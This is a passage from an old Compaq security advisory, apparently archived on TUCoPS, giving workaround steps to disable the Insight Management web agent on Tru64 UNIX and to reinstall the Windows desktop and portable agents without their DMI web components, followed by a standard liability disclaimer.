2. On Tru64 UNIX V4.0f and V4.0g, execute the command:
\"ln -s /sbin/init.d/insightd/sbin/rc2.d/ Kxxinsightd\"
where xx is any sequence Nb after the one used for snmpd
3. On Tru64 UNIX V5.0 and later, execute the
command: \"/usr/sbin/rcmgr set INSIGHTD_CONF 1\".
Desktop and Portable Web-Enabled Agents To remove the web-enabled
components from the desktop and portables agents, follow the
instructions below to uninstall the agents using the Add/Remove feature
in Windows systems, then reinstall the agents without the DMI web
components.
Uninstalling Web-Enabled Desktop Agent from a Windows 9x/NT system 1.
From the START menu, select SETTINGS, then CONTROL PANEL. 2. From the
CONTROL PANEL, select ADD/REMOVE PROGRAMS. 3. In the INSTALL/UNINSTALL
tab, select \"Compaq Insight Management
Web Agent\".4. Click ADD/REMOVE button to remove the agent.
For desktops and workstations, do not check \"DMI Web Component\"
during the installation.
To install the Compaq Management Agents for portables without web
support, select \"custom\" and then select \"DMI options\". Click on
the \"Change\" button. Remove the check marks for \"Compaq DMI Web
Agent\" and \"Compaq DMI Web Viewer\".
COMPAQ AND/OR ITS RESPECTIVE SUPPLIERS MAKE NO REPRESENTATIONS ABOUT
THE SUITABILITY OF THE INFORMATION CONTAINED IN THE DOCUMENTS AND
RELATED GRAPHICS AND/OR SOFTWARE PUBLISHED ON THIS SERVER FOR ANY
PURPOSE. ALL SUCH DOCUMENTS AND RELATED GRAPHICS ARE PROVIDED \"AS IS\"
WITHOUT WARRANTY OF ANY KIND AND ARE SUBJECT TO CHANGE WITHOUT NOTICE.
THE ENTIRE RISK ARISING OUT OF THEIR USE REMAINS WITH THE RECIPIENT. IN
NO EVENT SHALL COMPAQ AND/OR ITS RESPECTIVE SUPPLIERS BE LIABLE FOR ANY
DIRECT, CONSEQUENTIAL, INCIDENTAL, SPECIAL, PUNITIVE OR OTHER DAMAGES
WHATSOEVER (INCLUDING WITHOUT LIMITATION, DAMAGES FOR LOSS OF BUSINESS
PROFITS, BUSINESS INTERRUPTION, OR LOSS OF BUSINESS INFORMATION), EVEN
IF COMPAQ HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES.
TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2025 AOH
